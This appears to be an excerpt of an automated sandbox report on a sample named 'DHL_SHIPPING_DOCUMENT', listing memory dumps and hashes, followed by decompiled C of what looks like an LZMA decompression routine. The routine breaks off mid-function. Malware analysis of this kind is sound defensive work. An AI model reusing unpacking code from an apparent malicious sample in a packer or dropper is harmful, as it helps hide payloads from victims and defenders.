                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                              • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                              • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                              • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 98%
                                                              			E004070AB() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
